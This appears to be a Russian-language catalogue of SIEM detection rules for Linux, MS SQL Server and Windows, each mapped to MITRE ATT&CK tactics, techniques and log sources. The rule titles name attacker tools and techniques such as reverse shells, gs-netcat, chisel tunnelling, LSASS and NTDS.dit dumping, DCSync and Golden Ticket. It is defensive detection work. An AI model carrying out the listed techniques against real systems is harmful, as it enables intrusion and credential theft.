Linux		RV-D-480	Использование утилиты SSHuttle для создания SSH-туннеля	TA0011 (Command and Control)	T1572 (Protocol Tunneling)	Auditd
Linux		RV-D-481	Создание файла через Python/Ruby сценарий	TA0002 (Execution)	T1059 (Command and Scripting Interpreter), T1059.006 (Command and Scripting Interpreter: Python)	Auditd
Linux		RV-D-483	Злоупотребление сырыми сокетами	TA0011 (Command and Control)	T1095 (Non-Application Layer Protocol)	Auditd
Linux		RV-D-484	Изменение файлов в домашнем каталоге другим пользователем	TA0003 (Persistence)	T1565 (Data Manipulation), T1565.001 (Data Manipulation: Stored Data Manipulation)	Auditd
Linux		RV-D-485	Подозрительное изменение директории /etc	TA0003 (Persistence)	T1053 (Scheduled Task/Job), T1053.003 (Scheduled Task/Job: Cron), T1546 (Event Triggered Execution), T1546.004 (Event Triggered Execution: Unix Shell Configuration Modification)	Auditd
Linux		RV-D-486	Загрузка webshell оболочки Linux	TA0003 (Persistence)	T1505 (Server Software Component), T1505.003 (Server Software Component: Web Shell)	Auditd
Linux		RV-D-487	Повышение привилегий с помощью GTFOBins	TA0005 (Defense Evasion), TA0004 (Privilege Escalation)	T1059 (Command and Scripting Interpreter), T1059.004 (Command and Scripting Interpreter: Unix Shell), T1059.011 (Command and Scripting Interpreter: Lua), T1548 (Abuse Elevation Control Mechanism), T1548.001 (Abuse Elevation Control Mechanism: Setuid and Setgid), T1548.003 (Abuse Elevation Control Mechanism: Sudo and Sudo Caching)	Auditd
Linux		RV-D-488	Использование утилиты fusermount	TA0004 (Privilege Escalation)	T1068 (Exploitation for Privilege Escalation)	Auditd
Linux		RV-D-489	Поиск данных в сетевых папках Linux	TA0009 (Collection)	T1039 (Data from Network Shared Drive)	Auditd
Linux		RV-D-492	Размещение архивов в сетевой папке Linux	TA0009 (Collection)	T1074 (Data Staged)	Auditd
Linux		RV-D-509	Уничтожение информации на диске в Linux	TA0040 (Impact)	T1561 (Disk Wipe), T1561.001 (Disk Wipe: Disk Content Wipe), T1561.002 (Disk Wipe: Disk Structure Wipe)	Auditd
Linux		RV-D-511	Обнаружена команда reverse/bind шелла	TA0002 (Execution)	T1059 (Command and Scripting Interpreter), T1059.004 (Command and Scripting Interpreter: Unix Shell), T1059.006 (Command and Scripting Interpreter: Python)	Auditd
Linux		RV-D-516	Модификация файлов MOTD в Linux	TA0003 (Persistence)	T1546 (Event Triggered Execution), T1546.004 (Event Triggered Execution: Unix Shell Configuration Modification)	Auditd
Linux		RV-D-517	Модификация разрешений системных файлов в Linux	TA0003 (Persistence)	T1222 (File and Directory Permissions Modification), T1222.002 (File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification), T1548 (Abuse Elevation Control Mechanism), T1548.001 (Abuse Elevation Control Mechanism: Setuid and Setgid)	Auditd
Linux		RV-D-518	Запуск утилиты msldapdump для разведки	TA0007 (Discovery)	T1018 (Remote System Discovery), T1046 (Network Service Discovery), T1069 (Permission Groups Discovery), T1069.002 (Permission Groups Discovery: Domain Groups), T1087 (Account Discovery), T1087.002 (Account Discovery: Domain Account), T1201 (Password Policy Discovery), T1615 (Group Policy Discovery)	Auditd
Linux		RV-D-536	Обнаружение стеганографии в Linux	TA0005 (Defense Evasion)	T1027 (Obfuscated Files or Information), T1027.003 (Obfuscated Files or Information: Steganography)	Auditd
Linux		RV-D-538	Извлечение содержимого буфера в Linux	TA0009 (Collection)	T1115 (Clipboard Data)	Auditd
Linux		RV-D-546	Изменение timers на хосте Linux	TA0002 (Execution)	T1053 (Scheduled Task/Job), T1053.006 (Scheduled Task/Job: Systemd Timers)	Auditd
Linux		RV-D-547	Чтение критичных файлов Linux	TA0009 (Collection)	T1005 (Data from Local System), T1552 (Unsecured Credentials), T1552.001 (Unsecured Credentials: Credentials In Files)	Auditd
Linux		RV-D-548	Использование утилиты at	TA0003 (Persistence)	T1053 (Scheduled Task/Job), T1053.002 (Scheduled Task/Job: At)	Auditd
Linux		RV-D-549	Изменение системных библиотек Linux	TA0003 (Persistence)	T1554 (Compromise Host Software Binary)	Auditd
Linux		RV-D-550	Изменение настроек для скрытия пользователей	TA0005 (Defense Evasion)	T1564 (Hide Artifacts), T1564.002 (Hide Artifacts: Hidden Users)	Auditd
Linux		RV-D-572	Обнаружение компиляции исходного кода на Linux	TA0005 (Defense Evasion)	T1027 (Obfuscated Files or Information), T1027.004 (Obfuscated Files or Information: Compile After Delivery)	Auditd
Linux		RV-D-578	Запуск процесса с помощью ld.so	TA0003 (Persistence)	T1574 (Hijack Execution Flow), T1574.006 (Hijack Execution Flow: Dynamic Linker Hijacking)	Auditd
Linux		RV-D-579	Изменение бинарных файлов Linux	TA0003 (Persistence)	T1554 (Compromise Host Software Binary)	Auditd
Linux		RV-D-630	Атака regreSSHion	TA0001 (Initial Access)	T1190 (Exploit Public-Facing Application)	secure, auth
Linux		RV-D-657	Отключение мандатного контроля целостности	TA0005 (Defense Evasion)	T1562.001 (Impair Defenses: Disable or Modify Tools)	Auditd
Linux		RV-D-685	Добавление файла в расширения браузера Linux	TA0003 (Persistence)	T1176 (Software Extensions), T1176.001 (Software Extensions: Browser Extensions)	Auditd
Linux		RV-D-686	Добавление расширения в браузер через CLI Linux	TA0003 (Persistence)	T1176 (Software Extensions), T1176.001 (Software Extensions: Browser Extensions)	Auditd
Linux		RV-D-762	Аномальное bind-монтирование	TA0005 (Defense Evasion)	T1564 (Hide Artifacts), T1564.013 (Hide Artifacts: Bind Mounts)	Auditd
Linux		RV-D-763	Злоупотребление расширенными атрибутами	TA0005 (Defense Evasion)	T1564 (Hide Artifacts), T1564.014 (Hide Artifacts: Extended Attributes)	Auditd
Linux		RV-D-768	Использование chisel для туннелирования трафика	TA0011 (Command and Control)	T1572 (Protocol Tunneling)	Auditd
Microsoft	MSSQL	RV-D-632	Атака Password Spraying на MS SQL Server	TA0006 (Credential Access)	T1110 (Brute Force), T1110.003 (Brute Force: Password Spraying)	Application
Microsoft	MSSQL	RV-D-633	Подбор пароля к MS SQL Server	TA0006 (Credential Access)	T1110 (Brute Force), T1110.001 (Brute Force: Password Guessing)	Application
Microsoft	MSSQL	RV-D-634	Успешный подбор пароля MS SQL Server	TA0006 (Credential Access)	T1110 (Brute Force), T1110.001 (Brute Force: Password Guessing)	Application
Microsoft	MSSQL	RV-D-635	Вход привилегированного пользователя в MS SQL Server	TA0001 (Initial Access)	T1078 (Valid Accounts), T1078.003 (Valid Accounts: Local Accounts)	Application
Microsoft	MSSQL	RV-D-650	Изменение аудита базы данных MS SQL Server	TA0005 (Defense Evasion)	T1562.001 (Impair Defenses: Disable or Modify Tools)	dm_exec_cached_plans
Microsoft	MSSQL	RV-D-651	Получение информации об аудите MS SQL Server	TA0007 (Discovery)	T1518 (Software Discovery), T1518.001 (Software Discovery: Security Software Discovery)	Application
Microsoft	MSSQL	RV-D-652	Создание резервной копии БД MS SQL Server	TA0006 (Credential Access), TA0009 (Collection)	T1003 (OS Credential Dumping), T1005 (Data from Local System), T1074 (Data Staged), T1074.001 (Data Staged: Local Data Staging)	dm_exec_cached_plans, PowerShell
Microsoft	MSSQL	RV-D-653	Удаление нескольких таблиц в MS SQL Server	TA0040 (Impact)	T1485 (Data Destruction)	dm_exec_cached_plans
Microsoft	MSSQL	RV-D-654	Удаление базы данных в MS SQL Server	TA0040 (Impact)	T1485 (Data Destruction)	dm_exec_cached_plans
Microsoft	MSSQL	RV-D-655	Назначена роль администратора пользователю MS SQL Server	TA0003 (Persistence), TA0004 (Privilege Escalation)	T1098 (Account Manipulation)	dm_exec_cached_plans
Microsoft	MSSQL	RV-D-656	Изменение пароля привилегированной УЗ MS SQL Server	TA0003 (Persistence)	T1098 (Account Manipulation)	Security, dm_exec_cached_plans
Microsoft	MSSQL	RV-D-683	Получение хеша пароля пользователей MSSQL	TA0006 (Credential Access)	T1003 (OS Credential Dumping)	dm_exec_cached_plans
Microsoft	MSSQL	RV-D-684	Получение информации о привилегиях пользователя MSSQL	TA0007 (Discovery)	T1087 (Account Discovery)	dm_exec_cached_plans
Microsoft	MSSQL	RV-D-689	Получение информации о версии MSSQL	TA0007 (Discovery)	T1082 (System Information Discovery)	dm_exec_cached_plans
Microsoft	MSSQL	RV-D-690	Получение информации о пользователях MSSQL	TA0007 (Discovery)	T1087 (Account Discovery)	dm_exec_cached_plans
Microsoft	MSSQL	RV-D-691	Поиск пользователей с административными правами в MSSQL	TA0007 (Discovery)	T1087 (Account Discovery)	dm_exec_cached_plans
Microsoft	MSSQL	RV-D-692	Доступ к локальной файловой системе MSSQL	TA0007 (Discovery)	T1083 (File and Directory Discovery), T1565 (Data Manipulation)	dm_exec_cached_plans
Microsoft	MSSQL	RV-D-693	Получение информации о пользователях ОС	TA0007 (Discovery)	T1087 (Account Discovery)	dm_exec_cached_plans
Microsoft	MSSQL	RV-D-694	Получение информации об алгоритме шифрования БД	TA0007 (Discovery)	T1082 (System Information Discovery), T1518 (Software Discovery), T1518.001 (Software Discovery: Security Software Discovery)	dm_exec_cached_plans
Microsoft	MSSQL	RV-D-695	Попытка включить смешанную аутентификацию MS SQL	TA0005 (Defense Evasion)	T1112 (Modify Registry), T1556 (Modify Authentication Process)	dm_exec_cached_plans
Microsoft	MSSQL	RV-D-697	Установка небезопасного свойства MS SQL	TA0005 (Defense Evasion)	T1553 (Subvert Trust Controls), T1600 (Weaken Encryption)	dm_exec_cached_plans
Microsoft	MSSQL	RV-D-698	Отключение политики входа пользователей MS SQL	TA0005 (Defense Evasion), TA0003 (Persistence), TA0004 (Privilege Escalation)	T1098 (Account Manipulation), T1562.001 (Impair Defenses: Disable or Modify Tools)	dm_exec_cached_plans
Microsoft	MSSQL	RV-D-699	Включение небезопасных параметров в конфигурации MSSQL	TA0003 (Persistence), TA0004 (Privilege Escalation), TA0005 (Defense Evasion)	T1543 (Create or Modify System Process), T1543.003 (Create or Modify System Process: Windows Service), T1562.001 (Impair Defenses: Disable or Modify Tools)	Application
Microsoft	MSSQL	RV-D-700	Создание резервных копий MSSQL средствами PowerShell	TA0009 (Collection)	T1074 (Data Staged), T1213 (Data from Information Repositories)	PowerShell
Microsoft	MSSQL	RV-D-716	Использование процедур для локального выполнения кода	TA0002 (Execution)	T1059 (Command and Scripting Interpreter)	dm_exec_cached_plans
Microsoft	MSSQL	RV-D-717	Отправка результатов SQL-запроса почтой	TA0010 (Exfiltration)	T1567 (Exfiltration Over Web Service)	dm_exec_cached_plans
Microsoft	MSSQL	RV-D-734	Чтение ключа реестра средствами MSSQL	TA0007 (Discovery)	T1012 (Query Registry), T1082 (System Information Discovery)	Application
Microsoft	MSSQL	RV-D-735	Запись ключа реестра средствами MSSQL	TA0005 (Defense Evasion)	T1112 (Modify Registry)	Application
Microsoft	MSSQL	RV-D-736	Попытка изменить состояние службы Windows	TA0040 (Impact), TA0002 (Execution)	T1489 (Service Stop), T1569 (System Services), T1569.002 (System Services: Service Execution)	Application
Microsoft	MSSQL	RV-D-737	Попытка получить состояние службы Windows	TA0007 (Discovery)	T1007 (System Service Discovery), T1505 (Server Software Component), T1505.001 (Server Software Component: SQL Stored Procedures)	Application
Microsoft	MSSQL	RV-D-738	Попытка подключения к CУБД через DAC	TA0003 (Persistence)	T1505 (Server Software Component)	Application
Microsoft	MSSQL	RV-D-755	Использование хранимых процедур sp_proxy и sp_grant_proxy	TA0003 (Persistence), TA0005 (Defense Evasion)	T1505 (Server Software Component), T1505.001 (Server Software Component: SQL Stored Procedures), T1548 (Abuse Elevation Control Mechanism)	dm_exec_cached_plans
Microsoft	MSSQL	RV-D-756	Поиск резервных копий базы данных	TA0007 (Discovery), TA0003 (Persistence)	T1083 (File and Directory Discovery)	dm_exec_cached_plans
Microsoft	MSSQL	RV-D-758	Выгрузка ключа шифрования или сертификата MSSQL	TA0006 (Credential Access)	T1552 (Unsecured Credentials), T1552.004 (Unsecured Credentials: Private Keys), T1649 (Steal or Forge Authentication Certificates)	TrackBackupCrypto.xel
Microsoft	Windows	RV-D-88	Изменение запланированной задачи в групповой политике	TA0005 (Defense Evasion), TA0004 (Privilege Escalation)	T1484 (Domain or Tenant Policy Modification), T1484.001 (Domain or Tenant Policy Modification: Group Policy Modification)	Security
Microsoft	Windows	RV-D-230	Сжатие дамп-файлов средствами 7Zip	TA0009 (Collection)	T1560 (Archive Collected Data), T1560.001 (Archive Collected Data: Archive via Utility)	Security, Sysmon
Microsoft	Windows	RV-D-231	Сжатие дамп-файлов средствами WinRAR	TA0009 (Collection)	T1560 (Archive Collected Data), T1560.001 (Archive Collected Data: Archive via Utility)	Security, Sysmon
Microsoft	Windows	RV-D-232	Использование утилит для создания снимков экрана	TA0009 (Collection)	T1113 (Screen Capture)	PowerShell, Security, Sysmon
Microsoft	Windows	RV-D-233	Запросы к API Telegram подозрительным процессом	TA0011 (Command and Control)	T1102 (Web Service), T1102.002 (Web Service: Bidirectional Communication), T1567 (Exfiltration Over Web Service)	Sysmon
Microsoft	Windows	RV-D-234	Загрузка файлов с веб-ресурсов стандартными утилитами	TA0011 (Command and Control)	T1105 (Ingress Tool Transfer)	Security, Sysmon
Microsoft	Windows	RV-D-235	Туннелирование с использованием ngrok	TA0011 (Command and Control)	T1090 (Proxy), T1090.002 (Proxy: External Proxy), T1102 (Web Service), T1572 (Protocol Tunneling)	Security, Sysmon
Microsoft	Windows	RV-D-236	Использование DNS туннеля	TA0011 (Command and Control)	T1048 (Exfiltration Over Alternative Protocol), T1048.003 (Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted Non-C2 Protocol), T1071 (Application Layer Protocol), T1071.004 (Application Layer Protocol: DNS)	Sysmon
Microsoft	Windows	RV-D-237	Использование Replace.exe	TA0011 (Command and Control)	T1105 (Ingress Tool Transfer)	Security, Sysmon
Microsoft	Windows	RV-D-238	Установлено ПО для удаленного доступа	TA0011 (Command and Control), TA0008 (Lateral Movement), TA0003 (Persistence)	T1021 (Remote Services), T1021.005 (Remote Services: VNC), T1133 (External Remote Services), T1219 (Remote Access Tools), T1219.002 (Remote Access Tools: Remote Desktop Software)	Security
Microsoft	Windows	RV-D-239	RDP подключение с использованием туннеля	TA0011 (Command and Control)	T1572 (Protocol Tunneling)	Security, Sysmon
Microsoft	Windows	RV-D-240	Использование утилиты gs-netcat из набора инструментов gsocket	TA0011 (Command and Control)	T1090 (Proxy), T1090.002 (Proxy: External Proxy), T1572 (Protocol Tunneling)	Security, Sysmon
Microsoft	Windows	RV-D-241	Зафиксирована атака типа AS-REP Roasting	TA0005 (Defense Evasion), TA0003 (Persistence), TA0004 (Privilege Escalation), TA0001 (Initial Access)	T1078 (Valid Accounts), T1078.002 (Valid Accounts: Domain Accounts), T1110 (Brute Force), T1110.002 (Brute Force: Password Cracking), T1558 (Steal or Forge Kerberos Tickets), T1558.004 (Steal or Forge Kerberos Tickets: AS-REP Roasting)	Security
Microsoft	Windows	RV-D-242	Копирование веток реестра, содержащих хеши паролей	TA0006 (Credential Access)	T1003 (OS Credential Dumping), T1003.002 (OS Credential Dumping: Security Account Manager), T1003.004 (OS Credential Dumping: LSA Secrets)	Security
Microsoft	Windows	RV-D-243	Атака DCSync	TA0006 (Credential Access)	T1003 (OS Credential Dumping), T1003.006 (OS Credential Dumping: DCSync)	Security
Microsoft	Windows	RV-D-244	Зафиксирована атака Golden Ticket	TA0006 (Credential Access)	T1558 (Steal or Forge Kerberos Tickets), T1558.001 (Steal or Forge Kerberos Tickets: Golden Ticket)	PowerShell, Security, Sysmon
Microsoft	Windows	RV-D-245	Обнаружено создание билета TGT при помощи хакерской утилиты	TA0006 (Credential Access)	T1558 (Steal or Forge Kerberos Tickets), T1558.001 (Steal or Forge Kerberos Tickets: Golden Ticket)	Sysmon
Microsoft	Windows	RV-D-246	Попытка дампа процесса LSASS с помощью comsvcs.dll	TA0006 (Credential Access)	T1003 (OS Credential Dumping), T1003.001 (OS Credential Dumping: LSASS Memory)	Security
Microsoft	Windows	RV-D-247	Дамп LSASS с помощью Python-утилит	TA0006 (Credential Access)	T1003 (OS Credential Dumping), T1003.001 (OS Credential Dumping: LSASS Memory)	Sysmon
Microsoft	Windows	RV-D-248	Попытка дампа процесса LSASS с помощью утилиты Procdump	TA0006 (Credential Access)	T1003 (OS Credential Dumping), T1003.001 (OS Credential Dumping: LSASS Memory)	Security, Sysmon
Microsoft	Windows	RV-D-249	Попытка дампа процесса LSASS c помощью утилиты HandleKatz	TA0002 (Execution), TA0006 (Credential Access)	T1003 (OS Credential Dumping), T1003.001 (OS Credential Dumping: LSASS Memory), T1106 (Native API)	Sysmon
Microsoft	Windows	RV-D-250	Получение информации о службе RDP через sc.exe	TA0006 (Credential Access)	T1003 (OS Credential Dumping)	Security, Sysmon
Microsoft	Windows	RV-D-251	Обнаружена попытка дампа NTDS.dit	TA0005 (Defense Evasion), TA0006 (Credential Access)	T1003 (OS Credential Dumping), T1003.003 (OS Credential Dumping: NTDS), T1006 (Direct Volume Access)	Security, Sysmon, PowerShell
Microsoft	Windows	RV-D-252	Атака Password Spraying	TA0006 (Credential Access)	T1110 (Brute Force), T1110.003 (Brute Force: Password Spraying), T1110.004 (Brute Force: Credential Stuffing)	Security
Microsoft	Windows	RV-D-253	Захват учетных данных с помощью Rpcping.exe	TA0006 (Credential Access)	T1003 (OS Credential Dumping)	Security, Sysmon
Microsoft	Windows	RV-D-254	Подозрительный снэпшот базы данных Active Directory средствами ADExplorer	TA0006 (Credential Access)	T1552 (Unsecured Credentials), T1552.001 (Unsecured Credentials: Credentials In Files), T1552.003 (Unsecured Credentials: Bash History)	Security, Sysmon
Microsoft	Windows	RV-D-255	Поиск процессов с уязвимыми модулями	TA0006 (Credential Access), TA0007 (Discovery)	T1003 (OS Credential Dumping), T1057 (Process Discovery)	Security, Sysmon
Microsoft	Windows	RV-D-256	Зафиксировано использование утилиты RDPStrike	TA0006 (Credential Access), TA0009 (Collection)	T1055 (Process Injection), T1055.001 (Process Injection: Dynamic-link Library Injection), T1056 (Input Capture), T1056.004 (Input Capture: Credential API Hooking), T1212 (Exploitation for Credential Access)	Sysmon
Microsoft	Windows	RV-D-257	Возможно успешный подбор пароля пользователя	TA0006 (Credential Access)	T1110 (Brute Force), T1110.001 (Brute Force: Password Guessing)	Security
Microsoft	Windows	RV-D-258	Подозрительный доступ к файлу NTDS.dit	TA0006 (Credential Access)	T1003 (OS Credential Dumping), T1003.003 (OS Credential Dumping: NTDS)	Security
Microsoft	Windows	RV-D-259	Чтение процесса LSASS от подозрительного процесса	TA0006 (Credential Access)	T1003 (OS Credential Dumping), T1003.001 (OS Credential Dumping: LSASS Memory)	Security
Microsoft	Windows	RV-D-260	Подозрительный доступ к памяти процесса LSASS	TA0006 (Credential Access)	T1003 (OS Credential Dumping), T1003.001 (OS Credential Dumping: LSASS Memory)	Sysmon
Microsoft	Windows	RV-D-261	Дамп LSASS с помощью Диспетчера задач	TA0006 (Credential Access)	T1003 (OS Credential Dumping), T1003.001 (OS Credential Dumping: LSASS Memory)	Sysmon
Microsoft	Windows	RV-D-262	Подбор пароля учетной записи на хосте	TA0006 (Credential Access)	T1110 (Brute Force), T1110.001 (Brute Force: Password Guessing)	Security
Microsoft	Windows	RV-D-263	Множественные неудачные попытки аутентификации учетной записи	TA0006 (Credential Access)	T1110 (Brute Force), T1110.001 (Brute Force: Password Guessing)	Security
Microsoft	Windows	RV-D-264	Перечисление учетных записей в домене методом перебора	TA0006 (Credential Access)	T1087 (Account Discovery), T1087.002 (Account Discovery: Domain Account), T1110 (Brute Force), T1110.001 (Brute Force: Password Guessing)	Security
Microsoft	Windows	RV-D-265	Запуск aspnet_compiler.exe для компиляции приложения в нетипичной директории	TA0005 (Defense Evasion)	T1127 (Trusted Developer Utilities Proxy Execution)	Security, Sysmon
Microsoft	Windows	RV-D-266	Отключение или модификация Windows Audit Log Policy	TA0005 (Defense Evasion)	T1562.002 (Impair Defenses: Disable Windows Event Logging)	Security, Sysmon
Microsoft	Windows	RV-D-267	Журнал событий Windows был очищен	TA0005 (Defense Evasion)	T1070 (Indicator Removal), T1070.001 (Indicator Removal: Clear Windows Event Logs)	Security, System
Microsoft	Windows	RV-D-268	Обход UAC с помощью реестра	TA0005 (Defense Evasion)	T1548 (Abuse Elevation Control Mechanism), T1548.002 (Abuse Elevation Control Mechanism: Bypass User Account Control)	Sysmon
Microsoft	Windows	RV-D-269	Кодирование в Base64 файла в подозрительном каталоге с помощью Certutil	TA0005 (Defense Evasion)	T1027 (Obfuscated Files or Information)	Security, Sysmon
Microsoft	Windows	RV-D-270	Кодирование файла в Base64 с помощью Certutil	TA0005 (Defense Evasion)	T1027 (Obfuscated Files or Information)	Security, Sysmon
Microsoft	Windows	RV-D-271	Загрузка модуля в процесс cmstp из нестандартного пути	TA0005 (Defense Evasion), TA0002 (Execution)	T1129 (Shared Modules), T1218 (System Binary Proxy Execution), T1218.003 (System Binary Proxy Execution: CMSTP)	Sysmon
Microsoft	Windows	RV-D-272	Загрузка процессом cmstp модулей для выполнения скриптов	TA0005 (Defense Evasion), TA0002 (Execution)	T1129 (Shared Modules), T1218 (System Binary Proxy Execution), T1218.003 (System Binary Proxy Execution: CMSTP)	Sysmon
Microsoft	Windows	RV-D-273	Отключение CrashDump через изменение ветки реестра	TA0005 (Defense Evasion)	T1112 (Modify Registry)	Sysmon
Microsoft	Windows	RV-D-274	Удаленное создание потока процессом, расположенным в подозрительном месте	TA0005 (Defense Evasion)	T1562.001 (Impair Defenses: Disable or Modify Tools)	Sysmon
Microsoft	Windows	RV-D-275	Атака DCShadow	TA0005 (Defense Evasion)	T1207 (Rogue Domain Controller)	Security
Microsoft	Windows	RV-D-276	Отключение или модификация Windows Defender	TA0005 (Defense Evasion)	T1562.001 (Impair Defenses: Disable or Modify Tools)	PowerShell, Security, Sysmon, System
Microsoft	Windows	RV-D-277	Отключение ETW провайдера Windows Defender	TA0005 (Defense Evasion)	T1562.006 (Impair Defenses: Indicator Blocking)	PowerShell, Security, Sysmon
Microsoft	Windows	RV-D-278	Отключение или модификация Defender Firewall	TA0005 (Defense Evasion)	T1562.004 (Impair Defenses: Disable or Modify System Firewall)	Security, Sysmon
Microsoft	Windows	RV-D-279	Изменение политик Windows Defender Firewall	TA0005 (Defense Evasion)	T1562.004 (Impair Defenses: Disable or Modify System Firewall)	PowerShell, Security, Sysmon
Microsoft	Windows	RV-D-280	Отключение ETW провайдера .NET	TA0005 (Defense Evasion)	T1562.006 (Impair Defenses: Indicator Blocking)	PowerShell, Security, Sysmon
Microsoft	Windows	RV-D-281	Отключение службы Windows EventLog	TA0005 (Defense Evasion)	T1562.002 (Impair Defenses: Disable Windows Event Logging)	PowerShell, Security, Sysmon
Microsoft	Windows	RV-D-282	Отключение сбора событий EventLog через реестр	TA0005 (Defense Evasion)	T1562.002 (Impair Defenses: Disable Windows Event Logging)	Security, Sysmon
Microsoft	Windows	RV-D-283	Создание и удаление файла за короткий промежуток времени при помощи интерпретатора командной строки	TA0005 (Defense Evasion)	T1070 (Indicator Removal), T1070.004 (Indicator Removal: File Deletion), T1071.002 (Application Layer Protocol: File Transfer Protocols)	Sysmon
Microsoft	Windows	RV-D-284	Запуск файла с двойным расширением	TA0005 (Defense Evasion), TA0002 (Execution)	T1036 (Masquerading), T1036.007 (Masquerading: Double File Extension), T1204 (User Execution), T1204.002 (User Execution: Malicious File)	Security, Sysmon
Microsoft	Windows	RV-D-285	Запуск файла без расширения	TA0005 (Defense Evasion)	T1036 (Masquerading), T1036.008 (Masquerading: Masquerade File Type)	Security, Sysmon
Microsoft	Windows	RV-D-286	Эксплуатация утилиты GrimResource	TA0005 (Defense Evasion)	T1218 (System Binary Proxy Execution), T1218.014 (System Binary Proxy Execution: MMC)	Security, Sysmon
Microsoft	Windows	RV-D-287	Отключение логирования событий IIS	TA0005 (Defense Evasion)	T1562.002 (Impair Defenses: Disable Windows Event Logging)	PowerShell, Security, Sysmon
Microsoft	Windows	RV-D-288	Загрузка DLL системным процессом из подозрительного места	TA0005 (Defense Evasion)	T1070 (Indicator Removal)	Sysmon
Microsoft	Windows	RV-D-289	Неподписанная DLL загружена утилитой Windows	TA0005 (Defense Evasion)	T1218 (System Binary Proxy Execution), T1218.010 (System Binary Proxy Execution: Regsvr32), T1218.011 (System Binary Proxy Execution: Rundll32)	Sysmon
Microsoft	Windows	RV-D-290	Загрузка файлов с использованием LOLBins InstallUtil.exe	TA0005 (Defense Evasion)	T1218 (System Binary Proxy Execution), T1218.004 (System Binary Proxy Execution: InstallUtil)	Security, Sysmon
Microsoft	Windows	RV-D-291	Использование ветки реестра Provisioning_Commands для маскировки запуска программ	TA0005 (Defense Evasion)	T1218 (System Binary Proxy Execution)	Sysmon
Microsoft	Windows	RV-D-292	Загрузка модуля в процесс mmc из нестандартного пути	TA0005 (Defense Evasion), TA0002 (Execution)	T1129 (Shared Modules), T1218 (System Binary Proxy Execution), T1218.014 (System Binary Proxy Execution: MMC)	Sysmon
Microsoft	Windows	RV-D-293	Изменение чувствительных значений реестра, предназначенных для ухода от обнаружения	TA0005 (Defense Evasion)	T1112 (Modify Registry)	Sysmon
Microsoft	Windows	RV-D-294	Загрузка процессом mshta модулей для выполнения скриптов	TA0005 (Defense Evasion), TA0002 (Execution)	T1129 (Shared Modules), T1218 (System Binary Proxy Execution), T1218.005 (System Binary Proxy Execution: Mshta)	Sysmon
Microsoft	Windows	RV-D-295	Сетевое подключение из подозрительной директории	TA0011 (Command and Control)	T1105 (Ingress Tool Transfer)	Sysmon
Microsoft	Windows	RV-D-296	Создание сетевого подключения процессом Winlogon	TA0005 (Defense Evasion), TA0002 (Execution), TA0011 (Command and Control)	T1218 (System Binary Proxy Execution), T1218.011 (System Binary Proxy Execution: Rundll32)	Sysmon
Microsoft	Windows	RV-D-297	Загрузка модуля в процесс odbcconf из нестандартного пути	TA0005 (Defense Evasion), TA0002 (Execution)	T1129 (Shared Modules), T1218 (System Binary Proxy Execution), T1218.008 (System Binary Proxy Execution: Odbcconf)	Sysmon
Microsoft	Windows	RV-D-298	Запуск потенциально поддельного экземпляра hxtsr.exe	TA0005 (Defense Evasion)	T1036 (Masquerading)	Security, Sysmon
Microsoft	Windows	RV-D-299	Использование устаревшей версии PowerShell v2	TA0005 (Defense Evasion)	T1562.010 (Impair Defenses: Downgrade Attack)	PowerShell, Security, Sysmon
Microsoft	Windows	RV-D-300	Отключение ETW провайдера PowerShell	TA0005 (Defense Evasion)	T1562.006 (Impair Defenses: Indicator Blocking)	Security, Sysmon
Microsoft	Windows	RV-D-301	Запуск процесса AddinUtil.exe из подозрительной директории.	TA0005 (Defense Evasion)	T1218 (System Binary Proxy Execution)	Security, Sysmon
Microsoft	Windows	RV-D-302	Необычное выполнение приложений через AtBroker.EXE	TA0005 (Defense Evasion)	T1218 (System Binary Proxy Execution)	Security, Sysmon
Microsoft	Windows	RV-D-303	Установка root сертификата средствами CertMgr.exe	TA0005 (Defense Evasion)	T1553 (Subvert Trust Controls), T1553.004 (Subvert Trust Controls: Install Root Certificate)	Security, Sysmon
Microsoft	Windows	RV-D-304	Скачивание файлов с IP-адреса через CertOC.EXE	TA0005 (Defense Evasion)	T1218 (System Binary Proxy Execution)	Security, Sysmon
Microsoft	Windows	RV-D-305	Подозрительная DDL загружена средствами CertOC.exe	TA0005 (Defense Evasion)	T1218 (System Binary Proxy Execution)	Security, Sysmon
Microsoft	Windows	RV-D-306	Новый сертификат root был установлен средствами Certutil.exe	TA0005 (Defense Evasion)	T1553 (Subvert Trust Controls), T1553.004 (Subvert Trust Controls: Install Root Certificate)	Security, Sysmon
Microsoft	Windows	RV-D-307	Потенциально вредоносное использование элементов панели управления.	TA0005 (Defense Evasion), TA0002 (Execution), TA0003 (Persistence)	T1218 (System Binary Proxy Execution), T1218.002 (System Binary Proxy Execution: Control Panel), T1546 (Event Triggered Execution)	Security, Sysmon
Microsoft	Windows	RV-D-308	Скачивание файлов через IMEWDBLD.exe	TA0005 (Defense Evasion)	T1218 (System Binary Proxy Execution)	Security, Sysmon
Microsoft	Windows	RV-D-309	Дамп памяти процесса средствами Dotnet-Dump	TA0005 (Defense Evasion)	T1218 (System Binary Proxy Execution)	Security, Sysmon
Microsoft	Windows	RV-D-310	Попытка дампа оперативной памяти с помощью RdrLeakDiag.exe	TA0005 (Defense Evasion)	T1036 (Masquerading), T1036.001 (Masquerading: Invalid Code Signature)	Security, Sysmon
Microsoft	Windows	RV-D-311	Скачивание файла средствами MpCmpRun.EXE	TA0005 (Defense Evasion), TA0011 (Command and Control)	T1105 (Ingress Tool Transfer), T1218 (System Binary Proxy Execution)	Security, Sysmon
Microsoft	Windows	RV-D-312	Запуск подозрительного cab файла через msdt.exe	TA0005 (Defense Evasion)	T1202 (Indirect Command Execution)	Security, Sysmon
Microsoft	Windows	RV-D-313	Скачивание файлов через msedge_proxy.exe	TA0011 (Command and Control)	T1105 (Ingress Tool Transfer)	Security, Sysmon
Microsoft	Windows	RV-D-314	Вызов функции DllUnregisterServer через Msiexec.exe	TA0005 (Defense Evasion)	T1218 (System Binary Proxy Execution), T1218.007 (System Binary Proxy Execution: Msiexec)	Security, Sysmon
Microsoft	Windows	RV-D-315	Запуск произвольной DLL библиотеки средствами Msiexec.exe	TA0005 (Defense Evasion)	T1218 (System Binary Proxy Execution), T1218.007 (System Binary Proxy Execution: Msiexec)	Security, Sysmon
Microsoft	Windows	RV-D-316	Скачивание файлов через PresentationHost.exe	TA0011 (Command and Control)	T1105 (Ingress Tool Transfer)	Security, Sysmon
Microsoft	Windows	RV-D-317	Скачивание файла средствами ProtocolHandler	TA0005 (Defense Evasion), TA0011 (Command and Control)	T1105 (Ingress Tool Transfer), T1218 (System Binary Proxy Execution)	Security, Sysmon
